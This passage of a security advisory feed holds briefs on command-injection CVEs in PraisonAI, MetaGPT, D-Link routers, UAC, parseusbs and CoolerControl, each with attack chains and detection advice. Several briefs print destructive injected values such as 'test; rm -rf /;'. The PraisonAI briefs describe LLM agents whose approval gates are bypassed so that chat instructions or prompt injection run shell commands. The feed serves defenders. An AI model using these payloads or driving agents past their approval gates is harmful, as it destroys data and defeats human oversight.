<li>Deploy the Sigma rule for command injection attempts targeting UniFi Play devices (see below) to detect exploitation attempts in your environment.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>unifi</category><category>cve-2026-22563</category></item><item><title>PraisonAI UI Hardcoded Approval Mode Leads to Remote Code Execution</title><link>https://feed.craftedsignal.io/briefs/2024-01-09-praisonai-rce/</link><pubDate>Fri, 10 Apr 2026 19:25:49 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-09-praisonai-rce/</guid><description>A vulnerability in PraisonAI allows authenticated users to execute arbitrary shell commands due to a hardcoded approval setting in the Chainlit UI modules, overriding administrator configurations and bypassing intended approval gates; insufficient command sanitization allows for destructive command execution, leading to confidentiality breach, integrity compromise, and availability impact on the server.</description><content:encoded><![CDATA[<p>PraisonAI is vulnerable to remote code execution due to a misconfiguration in the Chainlit UI modules (<code>chat.py</code> and <code>code.py</code>). Specifically, the application hardcodes <code>config.approval_mode = &quot;auto&quot;</code>, effectively disabling the intended human-in-the-loop approval mechanism for ACP tool executions, even when administrators configure the application to require manual approval. This override occurs after the application loads administrator configurations from the <code>PRAISON_APPROVAL_MODE</code> environment variable. Consequently, an authenticated user, including those using default credentials, can instruct the LLM agent to execute arbitrary single-command shell operations on the server without any approval prompt, subject only to the PraisonAI process’s OS-level permissions. The vulnerability affects PraisonAI versions prior to 4.5.128.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker authenticates to the PraisonAI UI using valid credentials (default admin/admin if unchanged).</li>
<li>The attacker crafts a chat message that instructs the LLM agent to execute a shell command via the <code>acp_execute_command</code> function.</li>
<li>The LLM agent parses the message and prepares the command for execution.</li>
<li>Due to the hardcoded <code>approval_mode = &quot;auto&quot;</code> in <code>chat.py</code> or <code>code.py</code>, the command bypasses the intended approval process in <code>agent_tools.py</code>.</li>
<li>The <code>subprocess.run()</code> function in <code>action_orchestrator.py</code> executes the attacker-controlled command with <code>shell=True</code>.</li>
<li>The command executes with the permissions of the PraisonAI process.</li>
<li>The result of the command execution is returned to the attacker via the chat interface.</li>
<li>The attacker leverages this vulnerability to achieve code execution, data exfiltration, or other malicious objectives.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation allows an authenticated user to execute arbitrary shell commands on the server hosting PraisonAI. This can lead to:</p>
<ul>
<li><strong>Confidentiality breach:</strong> Read sensitive files accessible to the process (e.g., <code>/etc/passwd</code>, application secrets).</li>
<li><strong>Integrity compromise:</strong> Modify or delete files, install backdoors.</li>
<li><strong>Availability impact:</strong> Kill processes, consume resources, delete data.</li>
<li><strong>Administrator control undermined:</strong> The hardcoded <code>approval_mode</code> silently overrides administrator-configured settings, creating a false sense of security.</li>
<li><strong>Prompt injection vector:</strong> Malicious content could trigger command execution through auto-approved tools without direct user intent, especially through external sources like web searches or uploaded files.</li>
</ul>
<p>The vulnerable versions are PraisonAI versions prior to 4.5.128.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li><strong>Upgrade PraisonAI:</strong> Upgrade to version 4.5.128 or later to patch the vulnerability.</li>
<li><strong>Apply Code-Level Fix:</strong> If upgrading is not immediately feasible, manually remove the hardcoded override in <code>chat.py</code> and <code>code.py</code> as described in the advisory.</li>
<li><strong>Implement Allowlisting:</strong> Strengthen command sanitization by implementing an allowlist approach instead of a blocklist in the <code>_sanitize_command()</code> function as described in the advisory.</li>
<li><strong>Monitor Process Creation:</strong> Deploy the Sigma rule &ldquo;Detect Suspicious PraisonAI Command Execution&rdquo; to detect exploitation attempts.</li>
<li><strong>Monitor Network Connections:</strong> Deploy the Sigma rule &ldquo;Detect Suspicious Outbound Connection from PraisonAI&rdquo; to identify potential data exfiltration attempts.</li>
<li><strong>Review Authentication:</strong> Ensure strong passwords are in use and consider multi-factor authentication to mitigate risks from compromised credentials.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>rce</category><category>command-injection</category><category>praisonai</category></item><item><title>MetaGPT Bash.run Command Injection Vulnerability (CVE-2026-5974)</title><link>https://feed.craftedsignal.io/briefs/2026-04-metagpt-cmd-injection/</link><pubDate>Thu, 09 Apr 2026 20:16:29 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-metagpt-cmd-injection/</guid><description>A command injection vulnerability exists in FoundationAgents MetaGPT version 0.8.1 affecting the Bash.run function, enabling remote attackers to execute arbitrary OS commands via crafted input.</description><content:encoded><![CDATA[<p>A critical command injection vulnerability, tracked as CVE-2026-5974, has been identified in FoundationAgents MetaGPT up to version 0.8.1. The vulnerability resides within the <code>Bash.run</code> function located in the <code>metagpt/tools/libs/terminal.py</code> library. An attacker can exploit this flaw by injecting malicious commands into the <code>Bash.run</code> function, leading to arbitrary OS command execution on the target system. The vulnerability is remotely exploitable, posing a significant risk. Although the developers were notified via a pull request, no patch has been released as of the publication of this brief. This vulnerability could be exploited to gain unauthorized access, escalate privileges, or compromise the entire system.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a MetaGPT instance running version 0.8.1 or earlier.</li>
<li>The attacker crafts a malicious input string containing OS commands.</li>
<li>This malicious string is passed to the <code>Bash.run</code> function in <code>metagpt/tools/libs/terminal.py</code>.</li>
<li>Due to insufficient input validation, the injected commands are not properly neutralized.</li>
<li>The <code>Bash.run</code> function executes the injected OS commands using the underlying operating system&rsquo;s shell.</li>
<li>The attacker gains the ability to execute arbitrary code on the server.</li>
<li>The attacker could then install malware, create new user accounts, or exfiltrate sensitive data.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability could allow an attacker to execute arbitrary operating system commands on the server hosting the vulnerable MetaGPT instance. This could lead to complete system compromise, including data theft, malware installation, and denial-of-service attacks. Due to the nature of command injection, the impact is highly dependent on the privileges of the user account running the MetaGPT application.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply input validation and sanitization to the <code>Bash.run</code> function in the <code>metagpt/tools/libs/terminal.py</code> library to prevent command injection (CVE-2026-5974).</li>
<li>Monitor process creations for unusual commands executed by the MetaGPT application (see Sigma rule &ldquo;Detect Suspicious MetaGPT Bash.run Execution&rdquo;).</li>
<li>Deploy a web application firewall (WAF) to filter out potentially malicious payloads being sent to the MetaGPT application.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>metagpt</category><category>cve-2026-5974</category></item><item><title>MetaGPT OS Command Injection Vulnerability (CVE-2026-5972)</title><link>https://feed.craftedsignal.io/briefs/2026-04-metagpt-command-injection/</link><pubDate>Thu, 09 Apr 2026 20:16:28 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-metagpt-command-injection/</guid><description>A remote command injection vulnerability exists in FoundationAgents MetaGPT &lt;= 0.8.1 via the Terminal.run_command function, allowing unauthenticated attackers to execute arbitrary OS commands.</description><content:encoded><![CDATA[<p>CVE-2026-5972 describes a critical OS command injection vulnerability affecting FoundationAgents MetaGPT versions up to 0.8.1. The vulnerability resides in the <code>Terminal.run_command</code> function within the <code>metagpt/tools/libs/terminal.py</code> file. This flaw allows remote attackers to inject and execute arbitrary operating system commands on the affected system. The vulnerability is remotely exploitable, meaning that attackers can trigger it over a network without requiring local access. Public exploits for this vulnerability are available, increasing the risk of widespread exploitation. The patch identified as <code>d04ffc8dc67903e8b327f78ec121df5e190ffc7b</code> addresses this vulnerability and upgrading to a patched version is highly recommended.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker identifies a vulnerable MetaGPT instance running a version &lt;= 0.8.1.</li>
<li>The attacker crafts a malicious request targeting the <code>Terminal.run_command</code> function.</li>
<li>The malicious request contains an OS command injection payload within the input parameters expected by <code>Terminal.run_command</code>.</li>
<li>MetaGPT processes the request, passing the attacker-controlled input to the underlying operating system&rsquo;s command interpreter without proper sanitization.</li>
<li>The operating system executes the injected command as part of the MetaGPT process, granting the attacker code execution within the server environment.</li>
<li>The attacker leverages the initial foothold to escalate privileges, potentially gaining root access or compromising other services on the system.</li>
<li>The attacker may then install malware, establish persistence, or exfiltrate sensitive data.</li>
<li>The attacker achieves their final objective, which could include data theft, denial of service, or complete system compromise.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system. This can lead to complete system compromise, including data theft, malware installation, and denial of service. Given the publicly available exploit, unpatched MetaGPT instances are at immediate risk. The vulnerability has a CVSS v3.1 score of 7.3, indicating a high level of severity. The number of victims and sectors targeted is currently unknown, but given the nature of the vulnerability, any organization using MetaGPT is potentially at risk.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Apply the patch <code>d04ffc8dc67903e8b327f78ec121df5e190ffc7b</code> provided by FoundationAgents to remediate the vulnerability.</li>
<li>Monitor web server logs for suspicious requests targeting the MetaGPT application, specifically those containing command injection attempts (cs-uri-query, cs-method, sc-status).</li>
<li>Implement the provided Sigma rule to detect command execution originating from the MetaGPT application (logsource).</li>
<li>Review network traffic for unusual outbound connections originating from MetaGPT servers, which could indicate successful exploitation and malware installation (category: network_connection).</li>
<li>Enable and review process creation logs on MetaGPT servers to identify any unexpected child processes spawned by the MetaGPT application, as this could indicate command injection exploitation (category: process_creation).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>CVE-2026-5972</category><category>command-injection</category><category>metagpt</category></item><item><title>PraisonAI OS Command Injection Vulnerability (CVE-2026-40088)</title><link>https://feed.craftedsignal.io/briefs/2026-04-praisonai-command-injection/</link><pubDate>Thu, 09 Apr 2026 20:16:27 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-praisonai-command-injection/</guid><description>PraisonAI versions prior to 4.5.121 are vulnerable to OS command injection, allowing attackers to execute arbitrary shell commands via user-controlled input in agent workflows, YAML definitions, and LLM-generated tool calls.</description><content:encoded><![CDATA[<p>PraisonAI, a multi-agent teams system, is susceptible to OS command injection in versions prior to 4.5.121. The vulnerability, identified as CVE-2026-40088, stems from the <code>execute_command</code> function and workflow shell execution, which improperly handles user-controlled input. Attackers can inject arbitrary shell commands through shell metacharacters via agent workflows, YAML definitions, and LLM-generated tool calls. This can lead to complete system compromise. It is critical to upgrade to version 4.5.121 or later to remediate this vulnerability. The CVSS v3.1 base score for this vulnerability is 9.6, indicating a critical severity.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious YAML definition or workflow for PraisonAI.</li>
<li>This crafted input contains shell metacharacters designed to inject arbitrary commands.</li>
<li>The user (victim) imports or executes the attacker-supplied YAML or workflow within PraisonAI.</li>
<li>The <code>execute_command</code> function processes the input without proper sanitization.</li>
<li>The injected shell commands are executed by the underlying operating system.</li>
<li>The attacker gains arbitrary code execution privileges on the PraisonAI server.</li>
<li>The attacker can then perform lateral movement, data exfiltration, or system compromise.</li>
<li>The attacker can further leverage the compromised system to target other systems within the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-40088 allows an attacker to execute arbitrary commands on the PraisonAI server. This can lead to complete system compromise, data exfiltration, and potential lateral movement within the network. The severity of this vulnerability is rated as critical with a CVSS v3.1 score of 9.6. This could affect any organization using PraisonAI versions prior to 4.5.121.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Immediately upgrade PraisonAI to version 4.5.121 or later to patch CVE-2026-40088.</li>
<li>Implement input validation and sanitization for all user-supplied data processed by the <code>execute_command</code> function.</li>
<li>Monitor PraisonAI logs for suspicious command execution patterns after upgrading.</li>
<li>Deploy the Sigma rules provided below to detect potential exploitation attempts.</li>
<li>Review and restrict permissions of the PraisonAI service account to minimize the impact of successful command injection.</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>cve-2026-40088</category><category>command-injection</category><category>praisonai</category></item><item><title>D-Link DIR-882 Remote Command Injection Vulnerability (CVE-2026-5844)</title><link>https://feed.craftedsignal.io/briefs/2026-04-dlink-command-injection/</link><pubDate>Thu, 09 Apr 2026 05:16:06 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-dlink-command-injection/</guid><description>A command injection vulnerability (CVE-2026-5844) exists in the D-Link DIR-882 router version 1.01B02, allowing a remote attacker to execute arbitrary OS commands by manipulating the IPAddress argument in the HNAP1 SetNetworkSettings Handler via the prog.cgi script.</description><content:encoded><![CDATA[<p>CVE-2026-5844 describes a critical command injection vulnerability affecting D-Link DIR-882 routers running firmware version 1.01B02. The vulnerability resides in the <code>sprintf</code> function within the <code>prog.cgi</code> script, specifically within the HNAP1 SetNetworkSettings Handler. A remote, unauthenticated attacker can exploit this flaw by manipulating the <code>IPAddress</code> argument, injecting arbitrary OS commands that are then executed with elevated privileges. The vulnerability is considered critical due to the potential for complete system compromise and the availability of a public exploit. This vulnerability impacts products that are no longer supported by the maintainer, increasing the risk for users who have not migrated to newer devices.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker identifies a vulnerable D-Link DIR-882 router running firmware version 1.01B02.</li>
<li>The attacker sends a crafted HTTP request to the <code>prog.cgi</code> endpoint.</li>
<li>The HTTP request targets the HNAP1 SetNetworkSettings Handler.</li>
<li>The attacker manipulates the <code>IPAddress</code> argument within the HTTP request, injecting malicious OS commands.</li>
<li>The <code>sprintf</code> function in <code>prog.cgi</code> processes the attacker-controlled <code>IPAddress</code> argument without proper sanitization.</li>
<li>The injected OS commands are executed on the router&rsquo;s operating system due to the command injection vulnerability in <code>sprintf</code>.</li>
<li>The attacker gains remote code execution on the router.</li>
<li>The attacker can then perform actions such as modifying router settings, eavesdropping on network traffic, or using the router as a botnet node.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5844 allows a remote attacker to execute arbitrary OS commands on the vulnerable D-Link DIR-882 router. This can lead to a complete compromise of the device, enabling attackers to reconfigure the router, intercept network traffic, or use the compromised device as part of a botnet. The vulnerability affects end-of-life products, meaning no official patches are available. The impact is significant due to the widespread use of these routers in home and small business networks, where they can act as a gateway to internal systems.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule <code>Detect D-Link DIR-882 Command Injection Attempt</code> to detect suspicious requests to <code>prog.cgi</code> containing shell metacharacters.</li>
<li>Block access to the URL <code>https://files.catbox.moe/ei31k1.zip</code> to prevent the download of the publicly available exploit (IOC).</li>
<li>Monitor web server logs for HTTP requests to <code>prog.cgi</code> with unusually long <code>IPAddress</code> parameters (log source: webserver).</li>
<li>Implement network intrusion detection systems (IDS) rules to identify and block exploit attempts targeting CVE-2026-5844 (log source: network_connection).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>d-link</category><category>router</category><category>cve-2026-5844</category></item><item><title>UAC (Unix-like Artifacts Collector) Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2024-01-uac-command-injection/</link><pubDate>Wed, 08 Apr 2026 22:16:23 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-01-uac-command-injection/</guid><description>UAC before 3.3.0-rc1 is vulnerable to command injection in the _run_command() function, allowing attackers to execute arbitrary commands with the privileges of the UAC process through manipulated input values.</description><content:encoded><![CDATA[<p>UAC (Unix-like Artifacts Collector) before version 3.3.0-rc1 is susceptible to a command injection vulnerability. This flaw resides in the placeholder substitution and command execution pipeline within the application. Specifically, the <code>_run_command()</code> function directly passes constructed command strings to <code>eval</code> without proper sanitization. This lack of input validation allows attackers to inject malicious shell metacharacters or command substitutions into the command strings. Exploitation is possible through attacker-controlled inputs such as <code>%line%</code> values from <code>foreach</code> iterators and <code>%user%</code> / <code>%user_home%</code> values derived from system files. Successful exploitation leads to arbitrary command execution with the same privileges as the UAC process. This poses a significant risk to system integrity and confidentiality.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a vulnerable UAC instance running a version prior to 3.3.0-rc1.</li>
<li>Attacker crafts a malicious input string containing shell metacharacters or command substitutions, targeting either <code>%line%</code> values in <code>foreach</code> iterators, or the <code>%user%</code> and <code>%user_home%</code> values.</li>
<li>The attacker-controlled input is passed to UAC, potentially via a configuration file, command-line argument, or other input mechanism.</li>
<li>UAC&rsquo;s <code>_run_command()</code> function receives the malicious input and performs placeholder substitution.</li>
<li>The resulting command string, now containing the injected commands, is passed to the <code>eval</code> function without proper sanitization.</li>
<li>The <code>eval</code> function executes the attacker-injected commands with the privileges of the UAC process.</li>
<li>The attacker gains arbitrary code execution on the system.</li>
<li>The attacker can then perform actions such as data exfiltration, system compromise, or lateral movement within the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>The command injection vulnerability in UAC before 3.3.0-rc1 allows attackers to execute arbitrary commands on the affected system. The impact of successful exploitation includes complete system compromise, data breaches, and potential for lateral movement to other systems within the network. Since UAC is used to collect artifacts, successful exploitation could lead to the collection of sensitive data from the compromised system, which could then be exfiltrated. The specific number of potential victims is unknown.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade UAC to version 3.3.0-rc1 or later to patch CVE-2026-40032.</li>
<li>Implement input validation and sanitization for all user-supplied input, particularly those used in command construction and execution, to prevent command injection vulnerabilities.</li>
<li>Monitor process execution for unexpected or unauthorized commands originating from the UAC process, using the Sigma rules provided below.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>uac</category></item><item><title>parseusbs Unsanitized LNK File Command Injection Vulnerability</title><link>https://feed.craftedsignal.io/briefs/2026-04-parseusbs-cmd-injection/</link><pubDate>Wed, 08 Apr 2026 22:16:23 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-parseusbs-cmd-injection/</guid><description>parseusbs before 1.9 is vulnerable to OS command injection in parseUSBs.py due to unsanitized LNK file paths passed to os.popen(), allowing arbitrary command execution via crafted .lnk filenames.</description><content:encoded><![CDATA[<p>parseusbs before version 1.9 is susceptible to an OS command injection vulnerability (CVE-2026-40029) within the <code>parseUSBs.py</code> script. This flaw arises from the program&rsquo;s failure to sanitize LNK file paths before passing them to the <code>os.popen()</code> function. This allows an attacker to craft malicious .lnk filenames containing shell metacharacters. When <code>parseusbs</code> processes a USB drive containing such a file, the specially crafted filename is interpreted as a command, leading to arbitrary command execution on the system of the forensic examiner using the tool. The vulnerable versions of parseusbs are used by security professionals for USB forensic analysis, making successful exploitation dangerous for those running the tool.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>The attacker crafts a malicious .lnk file. The filename includes shell metacharacters designed to execute arbitrary commands. For example, a filename could be <code>test.lnk; rm -rf /tmp</code>.</li>
<li>The attacker places the crafted .lnk file onto a USB drive.</li>
<li>A forensic examiner uses parseusbs (version before 1.9) to analyze the USB drive.</li>
<li>The <code>parseUSBs.py</code> script processes the files on the USB drive, including the malicious .lnk file.</li>
<li>The script extracts the .lnk file path without proper sanitization.</li>
<li>The unsanitized .lnk file path is passed to the <code>os.popen()</code> function.</li>
<li>The <code>os.popen()</code> function interprets the shell metacharacters in the filename, executing the attacker&rsquo;s injected command.</li>
<li>The attacker achieves arbitrary code execution on the examiner&rsquo;s system, allowing them to potentially compromise the system, steal sensitive data, or further pivot into the network.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary commands on the system of a forensic examiner using <code>parseusbs</code>. This could lead to complete system compromise, data exfiltration, or further malicious activities. Given that <code>parseusbs</code> is a tool used by security professionals, a successful attack could have significant consequences, potentially exposing sensitive forensic data. The impact is particularly severe as the examiner likely has access to sensitive information related to their investigations.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade <code>parseusbs</code> to version 1.9 or later to remediate CVE-2026-40029.</li>
<li>Monitor process creation events for unexpected processes spawned by Python (<code>python.exe</code> or <code>python3</code>). Use the Sigma rule &ldquo;Detect Suspicious Process Creation by Python&rdquo; to detect potential exploitation attempts.</li>
<li>Implement file integrity monitoring for LNK files, particularly those found on USB drives. The Sigma rule &ldquo;Detect Creation of LNK Files in Removable Media&rdquo; can help identify suspicious LNK file creation.</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command injection</category><category>lnk</category><category>parseusbs</category><category>cve-2026-40029</category></item><item><title>parseusbs OS Command Injection Vulnerability (CVE-2026-40030)</title><link>https://feed.craftedsignal.io/briefs/2026-04-parseusbs-command-injection/</link><pubDate>Wed, 08 Apr 2026 22:16:23 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-parseusbs-command-injection/</guid><description>parseusbs before 1.9 is vulnerable to OS command injection (CVE-2026-40030) due to improper sanitization of the volume listing path argument, potentially allowing arbitrary command execution via crafted volume paths.</description><content:encoded><![CDATA[<p>parseusbs before version 1.9 is susceptible to an OS command injection vulnerability, identified as CVE-2026-40030. This flaw arises from the application&rsquo;s failure to sanitize the volume listing path argument (-v flag) before passing it to the <code>os.popen()</code> function in Python. This function executes shell commands, and in this case, uses <code>ls</code> to list volume contents. By crafting a malicious volume path containing shell metacharacters, an attacker can inject arbitrary commands that will be executed with the privileges of the parseusbs process. This vulnerability was reported by VulnCheck and patched in subsequent versions. Successful exploitation requires the attacker to control the <code>-v</code> flag&rsquo;s value, typically through command-line arguments.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker identifies a vulnerable parseusbs instance running a version prior to 1.9.</li>
<li>The attacker crafts a malicious volume path argument containing shell metacharacters (e.g., <code>;/</code>).</li>
<li>The attacker executes parseusbs with the <code>-v</code> flag, supplying the crafted volume path as the argument.  Example: <code>parseusbs -v &quot;; command&quot;</code></li>
<li>parseusbs passes the unsanitized volume path argument to the <code>os.popen()</code> function along with the <code>ls</code> command.</li>
<li>The <code>os.popen()</code> function executes the combined command within a shell, injecting the attacker&rsquo;s commands.</li>
<li>The injected commands are executed with the privileges of the parseusbs process.</li>
<li>The attacker gains arbitrary command execution, potentially leading to system compromise.</li>
<li>The attacker achieves persistence, lateral movement, or data exfiltration depending on the injected commands.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-40030 allows an attacker to execute arbitrary commands on the system where parseusbs is running. This can lead to a full system compromise, including data theft, modification, or destruction. Given a CVSS v3.1 score of 7.8, this vulnerability is considered high severity. While specific victim counts and sectors are unknown, any system running a vulnerable version of parseusbs is at risk, particularly if the application processes user-supplied volume paths.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade parseusbs to version 1.9 or later to remediate CVE-2026-40030 (Reference: Overview).</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Parseusbs Command Line Arguments</code> to identify potential exploitation attempts (Reference: Rules).</li>
<li>Monitor command-line arguments passed to parseusbs for shell metacharacters (e.g., <code>;/|&amp;</code>) (Reference: Attack Chain).</li>
</ul>
]]></content:encoded><category domain="severity">high</category><category domain="type">advisory</category><category>command-injection</category><category>vulnerability</category><category>linux</category></item><item><title>PraisonAI Vulnerable to OS Command Injection</title><link>https://feed.craftedsignal.io/briefs/2024-02-29-praisonai-command-injection/</link><pubDate>Wed, 08 Apr 2026 21:52:10 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2024-02-29-praisonai-command-injection/</guid><description>PraisonAI is vulnerable to OS command injection due to the use of `subprocess.run()` with `shell=True` on user-controlled inputs, allowing attackers to inject arbitrary shell commands and potentially leading to sensitive data exfiltration or system compromise in versions prior to 4.5.121.</description><content:encoded><![CDATA[<p>PraisonAI versions prior to 4.5.121 are susceptible to OS command injection. The vulnerability stems from the application&rsquo;s use of <code>subprocess.run()</code> with the <code>shell=True</code> parameter when executing commands derived from various user-controlled inputs. These inputs include YAML workflow definitions, agent configuration files (agents.yaml), LLM-generated tool call parameters, and recipe step configurations. This configuration allows an attacker to inject arbitrary shell commands through shell metacharacters, leading to potential remote code execution and system compromise. This vulnerability is particularly concerning in automated environments like CI/CD pipelines or agent workflows, where unintended command execution can occur without direct user awareness.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>An attacker crafts a malicious YAML workflow definition or modifies an existing one, injecting shell metacharacters into the <code>target</code> field of a <code>shell</code> step.</li>
<li>Alternatively, the attacker modifies the <code>agents.yaml</code> file, injecting malicious commands into the <code>shell_command</code> field of an agent task.</li>
<li>The attacker triggers the execution of the crafted YAML workflow or loads the modified <code>agents.yaml</code> file using PraisonAI&rsquo;s command-line interface.</li>
<li>PraisonAI parses the YAML file and extracts the attacker-controlled command string.</li>
<li>The application then passes this command string to <code>subprocess.run()</code> with <code>shell=True</code>, allowing the shell to interpret the injected metacharacters.</li>
<li>The shell executes the attacker&rsquo;s injected commands, potentially performing actions like reading sensitive files, exfiltrating data, or modifying system configurations.</li>
<li>If using agent mode, an attacker can influence the LLM&rsquo;s context to generate malicious tool calls including shell commands.</li>
<li>The attacker achieves arbitrary code execution with the privileges of the PraisonAI process, leading to system compromise or data breach.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of this vulnerability allows an attacker to execute arbitrary shell commands on the affected system. This can lead to a variety of negative consequences, including unauthorized access to sensitive data (such as configuration files, credentials, or user data), modification or deletion of system files, and potentially full system compromise. In automated environments like CI/CD pipelines, this vulnerability could allow an attacker to inject malicious code into software builds, leading to supply chain attacks. The vulnerability affects versions of PraisonAI prior to 4.5.121.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Deploy the Sigma rule &ldquo;Detect PraisonAI Command Injection via Workflow&rdquo; to identify attempts to exploit this vulnerability through malicious YAML workflow definitions (logsource: <code>process_creation</code>).</li>
<li>Deploy the Sigma rule &ldquo;Detect PraisonAI Command Injection via Agent Configuration&rdquo; to identify attempts to exploit this vulnerability through malicious agent configurations (logsource: <code>process_creation</code>).</li>
<li>Block the C2 domain <code>attacker.com</code> listed in the IOC table at the DNS resolver to prevent data exfiltration and command-and-control communication (type: <code>domain</code>, value: <code>attacker.com</code>).</li>
<li>Upgrade PraisonAI to version 4.5.121 or later to patch this vulnerability (Affected Packages).</li>
</ul>
]]></content:encoded><category domain="severity">critical</category><category domain="type">advisory</category><category>command-injection</category><category>rce</category><category>praisonai</category></item><item><title>CoolerControl Command Injection Vulnerability (CVE-2026-5208)</title><link>https://feed.craftedsignal.io/briefs/2026-04-coolercontrol-cmd-injection/</link><pubDate>Wed, 08 Apr 2026 12:16:22 +0000</pubDate><author>hello@craftedsignal.io</author><guid isPermaLink="true">https://feed.craftedsignal.io/briefs/2026-04-coolercontrol-cmd-injection/</guid><description>CoolerControl/coolercontrold versions before 4.0.0 are vulnerable to command injection, allowing authenticated attackers with high privileges to execute arbitrary code as root by injecting bash commands into alert names.</description><content:encoded><![CDATA[<p>CoolerControl/coolercontrold, a system monitoring and management tool, is susceptible to a command injection vulnerability (CVE-2026-5208) in versions prior to 4.0.0. The vulnerability stems from insufficient sanitization of user-supplied input used to create alert names. An authenticated attacker with high privileges can inject arbitrary bash commands into the alert name field. Due to the application&rsquo;s execution context, these injected commands are executed with root privileges, potentially leading to complete system compromise. The vulnerability was reported and patched in version 4.0.0. This poses a significant risk to organizations using affected versions of CoolerControl/coolercontrold, as it allows for trivial privilege escalation and arbitrary code execution.</p>
<h2 id="attack-chain">Attack Chain</h2>
<ol>
<li>Attacker authenticates to the CoolerControl/coolercontrold application with high-privilege credentials.</li>
<li>Attacker navigates to the alert configuration section of the application.</li>
<li>Attacker crafts a malicious alert name containing injected bash commands (e.g., <code>test; rm -rf /;</code>).</li>
<li>Attacker saves the new alert configuration with the injected command in the alert name.</li>
<li>When the alert is triggered or processed by the application, the injected command is executed within the context of the CoolerControl/coolercontrold process.</li>
<li>Due to insufficient input validation, the operating system executes the injected command, in this example <code>rm -rf /</code> which would recursively delete every file on the system.</li>
<li>The injected commands are executed with root privileges, resulting in arbitrary code execution.</li>
<li>The attacker gains complete control of the system.</li>
</ol>
<h2 id="impact">Impact</h2>
<p>Successful exploitation of CVE-2026-5208 allows an attacker to execute arbitrary code with root privileges on the affected system. This could lead to complete system compromise, including data theft, data destruction, denial of service, and the installation of backdoors or other malicious software. Since this can be exploited via an application setting, a wide range of systems could be impacted.</p>
<h2 id="recommendation">Recommendation</h2>
<ul>
<li>Upgrade CoolerControl/coolercontrold to version 4.0.0 or later to patch CVE-2026-5208, as mentioned in the vulnerability description.</li>
<li>Deploy the Sigma rule <code>Detect Suspicious Alert Creation</code> to identify attempts to inject commands into alert names.</li>
<li>Monitor process creation events for suspicious commands executed by the CoolerControl/coolercontrold process. Enable Sysmon process-creation logging to facilitate this.</li>
<li>Review existing alert configurations for any suspicious or unexpected commands.</li>
</ul>
